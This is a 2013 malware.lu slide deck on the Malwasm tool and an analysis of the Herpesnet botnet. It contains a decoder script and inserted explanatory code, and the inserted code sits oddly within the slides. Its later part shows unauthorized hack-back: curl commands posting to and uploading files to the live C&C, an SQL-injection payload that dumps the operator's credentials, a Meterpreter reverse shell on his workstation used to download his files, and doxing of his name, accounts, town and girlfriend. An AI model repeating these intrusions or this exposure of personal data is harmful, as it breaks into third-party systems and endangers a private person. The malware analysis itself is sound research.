Malware.lu overview, Malwasm, Herpesnet
Our tool and how one of our analyses was nominated for the DEFCON Pwnie Awards
@r00tbsd - Paul Rascagneres
malware.lu
February 2013
@r00tbsd - Paul Rascagneres Malware.lu overview
Plan
1 Malware.lu overview: Introduction, Some numbers, Screenshots
2 Malwasm: Presentation, Demo
3 Herpesnet: Introduction, Analysis, C&C, Pown the C&C, Doxing, Conclusion
Introduction
Presentation of the project malware.lu. Maintainers list:
@r00tbsd - Paul Rascagneres
@y0ug - Hugo Caron
Defane - Stephane Emma
MiniLX - Julien Maladrie
Some numbers
The project in numbers:
4,799,918 Samples
30 articles
complete analysis of Red October or Rannoh
1400 users
1582 followers on twitter (@malwarelu)
7GB in database
3 TB of malware
1 malware analysis tool released: malwasm
business (reverse engineering, CERT...)
Malware.lu screenshot
Malware.lu screenshot
Malwasm presentation
Malwasm is an open-source tool to help reverse engineers.
Malwasm is based on Cuckoo Sandbox.
Malwasm can be downloaded here: http://code.google.com/p/malwasm/
An online demo is available here: http://malwasm.com (be patient with the server...)
Malwasm step by step:
The malware to analyse is executed in a virtual machine with Cuckoo Sandbox
All activities of the sample are stored in a database (Postgres)
A web service is started to serve the data stored in the database
The user uses a browser to visualize the data
The activity of the malware is captured by a Pin tool developed for Malwasm. Activities stored in the database:
Register values
Flag values
Instructions
Stack
Heap
Data
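To make the storage model concrete, here is an added example (not Malwasm's own code or schema; Malwasm records its trace with a Pin tool into Postgres) that writes a constructed, hand-made instruction trace into an in-memory SQLite database with one row per executed instruction, carrying the register and flag values at that point. The addresses, instructions and register values are invented. The point it shows is why this layout is enough for a browser-based viewer to step forwards and backwards, highlight what changed, and find every iteration of a loop body without re-running the sample.

```python
#!/usr/bin/env python3
"""Replayable instruction-trace store, modelled on the kind of data Malwasm
keeps per executed instruction (added example, not Malwasm's code or schema)."""
import json
import sqlite3

SCHEMA = """
CREATE TABLE instructions (
    step   INTEGER PRIMARY KEY,  -- position in the execution trace
    eip    INTEGER NOT NULL,     -- address of the executed instruction
    disasm TEXT    NOT NULL,     -- textual instruction
    regs   TEXT    NOT NULL,     -- JSON: register values after execution
    flags  TEXT    NOT NULL      -- JSON: flag values after execution
);
CREATE INDEX instructions_eip ON instructions(eip);
"""


class TraceStore:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(SCHEMA)

    def record(self, step, eip, disasm, regs, flags):
        """Store the machine state observed right after one instruction."""
        self.db.execute(
            "INSERT INTO instructions VALUES (?, ?, ?, ?, ?)",
            (step, eip, disasm, json.dumps(regs), json.dumps(flags)))

    def state_at(self, step):
        """Full state at one trace position (what a viewer shows for that step)."""
        row = self.db.execute(
            "SELECT eip, disasm, regs, flags FROM instructions WHERE step = ?",
            (step,)).fetchone()
        if row is None:
            raise KeyError("no such step: %d" % step)
        eip, disasm, regs, flags = row
        return {"eip": eip, "disasm": disasm,
                "regs": json.loads(regs), "flags": json.loads(flags)}

    def diff(self, step):
        """Registers and flags that changed between step-1 and step, i.e. the
        values a stepping UI highlights. Step 0 is compared against nothing."""
        after = self.state_at(step)
        if step == 0:
            return {"regs": sorted(after["regs"]), "flags": sorted(after["flags"])}
        before = self.state_at(step - 1)
        return {
            "regs": sorted(r for r, v in after["regs"].items()
                           if before["regs"].get(r) != v),
            "flags": sorted(f for f, v in after["flags"].items()
                            if before["flags"].get(f) != v),
        }

    def steps_at(self, eip):
        """Every trace position that executed a given address (a loop body hits it repeatedly)."""
        return [s for (s,) in self.db.execute(
            "SELECT step FROM instructions WHERE eip = ? ORDER BY step", (eip,))]


def build_sample_trace():
    """Constructed trace of a three-iteration countdown loop summing 3+2+1 into ecx.
    Addresses, instructions and values are made up for the example."""
    store = TraceStore()
    trace = [  # (eip, disasm, eax, ecx, ZF) after each instruction executes
        (0x401000, "mov eax, 3",    3, 0, 0),
        (0x401005, "xor ecx, ecx",  3, 0, 1),
        (0x401007, "add ecx, eax",  3, 3, 0),
        (0x401009, "dec eax",       2, 3, 0),
        (0x40100a, "jnz 0x401007",  2, 3, 0),
        (0x401007, "add ecx, eax",  2, 5, 0),
        (0x401009, "dec eax",       1, 5, 0),
        (0x40100a, "jnz 0x401007",  1, 5, 0),
        (0x401007, "add ecx, eax",  1, 6, 0),
        (0x401009, "dec eax",       0, 6, 1),
        (0x40100a, "jnz 0x401007",  0, 6, 1),
    ]
    for step, (eip, disasm, eax, ecx, zf) in enumerate(trace):
        store.record(step, eip, disasm, {"eax": eax, "ecx": ecx}, {"ZF": zf})
    return store


if __name__ == "__main__":
    store = build_sample_trace()
    for step in range(11):
        st = store.state_at(step)
        print("%2d %#x %-14s regs=%s flags=%s changed=%s"
              % (step, st["eip"], st["disasm"], st["regs"], st["flags"], store.diff(step)))
    print("loop body executed at steps", store.steps_at(0x401007))
```

Because every row is a complete snapshot rather than a delta, `state_at` is a single primary-key lookup in either direction, which is what makes backwards stepping cheap; the index on `eip` is what turns "show me every iteration of this address" into one query.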
DEMO
Introduction
One of our users sent us a sample of a botnet called Herpesnet. Sample hash is: db6779d497cb5e22697106e26eebfaa8.
We decided to analyse this sample. The sample is available here: http://www.malware.lu/_search.php?md5=db6779d497cb5e22697106e26eebfaa8
Config
The malware is not packed; we are interested in decoding the configuration of the malware.
[Figure: sub_406FC0 (initVariable)] Explanation:
This part is in charge of decoding all strings.
The decode function (sub_403034) is used to decode the string stored in ECX.
Decoder
Script to decode the strings (decode.py, same logic as the original, runnable under Python 3):

#!/usr/bin/env python3
import sys


def decode(src):
    """Decode one configuration string.

    Lowercase letters are rotated by 13 (ROT13). Uppercase letters pass through
    unchanged: the formula below maps them onto themselves, which the script's
    output on the next slide confirms. Every other byte is copied as is."""
    r = ""
    for c in src:
        c = ord(c)
        if c < 0x61 or c > 0x7a:
            if c < 0x41 or c > 0x5a:
                r += chr(c)
                continue
            x = ((c - 0x41) % 0x1a) + 0x41
        else:
            x = ((c - 0x54) % 0x1a) + 0x61
        r += chr(x)
    return r


def main():
    if len(sys.argv) != 2:
        sys.exit(1)
    # The encoded strings sit at file offset 0x1ae88 of the sample, 0x32f bytes long,
    # separated by NUL bytes.
    with open(sys.argv[1], 'rb') as f:
        f.seek(0x1ae88, 0)
        data = f.read(0x32f)
    for d in data.split(b"\0"):
        if len(d) == 0:
            continue
        d = d.decode('latin-1')
        print("%s: %s" % (d, decode(d)))


if __name__ == "__main__":
    main()

decode.py
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Decoder
Execution of the script:

y0ug@malware.lu:~/herpes$ python decode-all.py db6779d497cb5e22697106e26eebfaa8
tcerfhygy: gpresultl
3.0: 3.0
uggc://qq.mrebkpbqr.arg/urecarg/: http://dd.zeroxcode.net/herpnet/
74978o6rpp6p19836n17n3p2pq0840o0: 74978b6ecc6c19836a17a3c2cd0840b0
uggc://jjj.mrebkpbqr.arg/urecarg/: http://www.zeroxcode.net/herpnet/
sgc.mrebkpbqr.arg: ftp.zeroxcode.net
uggc://sex7.zvar.ah/urecarg/: http://frk7.mine.nu/herpnet/
hcybnq@mrebkpbqr.arg: upload@zeroxcode.net
hccvg: uppit
ujsdsdbbngfgjhhuugfgfujd: hwfqfqooatstwuuhhtstshwq
rffggghooo: esstttubbb
Ashfurncsmx: Afusheapfzk

decode.bash
C&C contact
The function used to build the request to the C&C is sub_4059E0 (buildReq).
[Figures: call to buildReq; buildReq]
The POST request looks like this:
userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724
The field "id" is not required; if it is not set, the response to the POST request returns an id to the bot:
USER-AGENT
The C&C checks the User-Agent value. It must be equal to 74978b6ecc6c19836a17a3c2cd0840b0.
An example of curl command line to send information to the C&C:

y0ug@malware.lu:~/herpes$ curl -A \
74978b6ecc6c19836a17a3c2cd0840b0 \
-d "userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0"\
"&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none"\
"&vidinfo=none&laninf=none&id=23724"\
http://www.zeroxcode.net/herpnet/run.php

curl.bash

An example of curl command line to upload a file to the C&C:

y0ug@malware.lu:~/herpes$ curl -F upfile=@test.jpg -A \
74978b6ecc6c19836a17a3c2cd0840b0 \
http://www.zeroxcode.net/herpnet/uploads/uppit.php
File caricato correttamente

curl2.bash
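The check-in protocol above gives a defender three stable network indicators: the fixed User-Agent the C&C insists on, the fixed set of POST field names, and the hosts and paths recovered from the decoded configuration. The following added example (not from the slides and not malware.lu code) turns them into a small detector run over constructed proxy log lines. The log format is invented for the example: one record per line, "<src_ip> <METHOD> <host> <path> <user-agent> <body>", with the user agent and body quoted when they contain spaces; the sample records themselves are constructed, and the host example.invalid stands in for an unknown C&C.

```python
#!/usr/bin/env python3
"""Flag Herpesnet C&C check-ins in constructed HTTP proxy log lines.

Added example, not malware.lu code. Indicators are taken from the analysis
of the sample: the User-Agent the C&C requires, the POST field names of the
check-in, and the hosts/paths from the decoded configuration."""
import shlex
from urllib.parse import parse_qs

# Values from the analysis (decoded configuration and the observed POST request).
HERPESNET_UA = "74978b6ecc6c19836a17a3c2cd0840b0"
C2_HOSTS = {"www.zeroxcode.net", "dd.zeroxcode.net", "frk7.mine.nu"}
C2_PATHS = {"/herpnet/run.php", "/herpnet/uploads/uppit.php"}
# Fields the bot sends on every check-in; "id" is absent on the first contact,
# because the C&C hands the id back in its response.
BEACON_FIELDS = {"userandpc", "admin", "os", "hwid", "ownerid", "version",
                 "raminfo", "cpuinfo", "hdiskinfo", "uptime", "mining",
                 "pinfo", "vidinfo", "laninf"}


def parse_line(line):
    """Split one constructed log line into its six fields; shlex keeps quoted
    user agents and bodies together as single tokens."""
    src, method, host, path, ua, body = shlex.split(line)
    return {"src": src, "method": method, "host": host, "path": path,
            "ua": ua, "body": body}


def classify(rec):
    """Return the list of indicator names matched by one parsed record."""
    hits = []
    if rec["ua"] == HERPESNET_UA:
        hits.append("fixed-user-agent")
    if rec["host"] in C2_HOSTS:
        hits.append("known-c2-host")
    if rec["path"] in C2_PATHS:
        hits.append("c2-path")
    if rec["method"] == "POST" and rec["body"]:
        fields = set(parse_qs(rec["body"], keep_blank_values=True))
        # The full field set identifies the check-in even when the C&C host
        # has moved; a missing "id" means this bot is registering for the first time.
        if BEACON_FIELDS <= fields:
            hits.append("beacon-fields")
            if "id" not in fields:
                hits.append("first-contact")
    return hits


def scan(lines):
    """Return (src, host, hits) for every record matching at least one indicator."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        hits = classify(rec)
        if hits:
            alerts.append((rec["src"], rec["host"], hits))
    return alerts


# Constructed sample traffic: a first check-in to a known C&C host, a registered
# bot beaconing to an unknown host (the protocol still gives it away), and a
# benign browser request.
SAMPLE_LOG = [
    '10.0.0.5 POST www.zeroxcode.net /herpnet/run.php 74978b6ecc6c19836a17a3c2cd0840b0 '
    '"userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256'
    '&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none"',
    '10.0.0.7 POST example.invalid /herpnet/run.php 74978b6ecc6c19836a17a3c2cd0840b0 '
    '"userandpc=bar&admin=0&os=Windows7&hwid=9&ownerid=12345&version=3.0&raminfo=2048'
    '&cpuinfo=i5&hdiskinfo=500GO&uptime=42&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724"',
    '10.0.0.9 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 6.1)" ""',
]

if __name__ == "__main__":
    for src, host, hits in scan(SAMPLE_LOG):
        print("%s -> %s: %s" % (src, host, ", ".join(hits)))
```

Matching on the field set as well as on the User-Agent and hosts is deliberate: the hosts and the agent string are the first things a botnet operator changes after an analysis is published, while the check-in format is baked into the bot binary and survives a C&C move.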
Pown the C&C - Part 1
Out of curiosity we tried to find an SQLi on the URL: http://www.zeroxcode.net/herpnet/run.php.

Place: POST
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345
&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO
&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none
&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ
---

[08:22:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

sqlmap
With the SQLi we extracted the table names:

Database: herpnet
[7 tables]
+----------+
| clients  |
| clinfo   |
| commands |
| htickets |
| husers   |
| paypalt  |
| uploads  |
+----------+

database
And we extracted the username and password of the malware's author.

+-----------------------------------------------------+
| id | username | password                            |
|-----------------------------------------------------|
| 1  | Frk7     | 6e6bc4e49dd477ebc98ef4046c067b5f    |
+-----------------------------------------------------+

username

After a simple Google search:

6e6bc4e49dd477ebc98ef4046c067b5f: ciao

password
C&C interface
C&C login page
C&C panel page
C&C option
Bot information
Pown the C&C - Part 2
We saw that the developer uses a machine called Frk7Test@FRK7TEST-D6E0BD.
We used his own functionality to execute a Meterpreter on his workstation.
Meterpreter

msf exploit(handler) > exploit

[*] Started reverse handler on 94.21.200.63:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 151.63.47.177
[*] Meterpreter session 1 opened (94.21.200.63:4444 -> 151.63.47.177:53574)
meterpreter > screenshot
Screenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpeg

meterpreter > sysinfo
System Language : it_IT
OS              : Windows XP (Build 2600, Service Pack 3).
Computer        : FRK7TEST-D6E0BD
Architecture    : x86
Meterpreter     : x86/win32
meterpreter >

meterpreter-1
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 2
meterpreter

meterpreter > ls
Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un
=============================================================

Mode              Size    Type  Last modified                   Name
----              ----    ----  -------------                   ----
40777/rwxrwxrwx   0       dir   Mon May 21 15:26:37 +0200 2012  .
40777/rwxrwxrwx   0       dir   Mon May 21 15:37:07 +0200 2012  ..
40777/rwxrwxrwx   0       dir   Mon May 21 14:53:32 +0200 2012  Debug
40777/rwxrwxrwx   0       dir   Mon May 21 16:06:41 +0200 2012  Herpes
100666/rw-rw-rw-  890     fil   Mon May 07 20:42:22 +0200 2012  Herpes.sln
100666/rw-rw-rw-  167424  fil   Mon May 21 16:14:06 +0200 2012  Herpes.suo
40777/rwxrwxrwx   0       dir   Mon May 21 16:15:12 +0200 2012  Release
100777/rwxrwxrwx  134     fil   Mon May 07 20:42:12 +0200 2012  clean.bat
100666/rw-rw-rw-  134     fil   Mon May 07 20:42:22 +0200 2012  roba da fare.txt

meterpreter > download -r Herpes ./
[*] downloading: Herpes\antidebug.h -> .//antidebug.h
[*] downloaded : Herpes\antidebug.h -> .//antidebug.h
[*] mirroring  : Herpes\base64 -> .//base64
[*] downloading: Herpes\base64\base64.c -> .//base64/base64.c
[*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c
[*] downloading: Herpes\base64\base64.h -> .//base64/base64.h

meterpreter-2
screenshot
Doxing
We did some searching to identify the maintainer of the botnet. We had his pseudonym: frk7.
Real name
Facebook account
Picasa account
Twitter account
Hacking repository
We found:
His real name: Francesco P*
4 email addresses
1 Skype account
1 Facebook account
1 Twitter account
1 Picasa account
The town where he lives ;)
a picture of his girlfriend...
Conclusion
Managing a botnet and putting personal data on the Internet is not a wonderful idea.
Without huge resources we easily identified the manager of an illegal activity.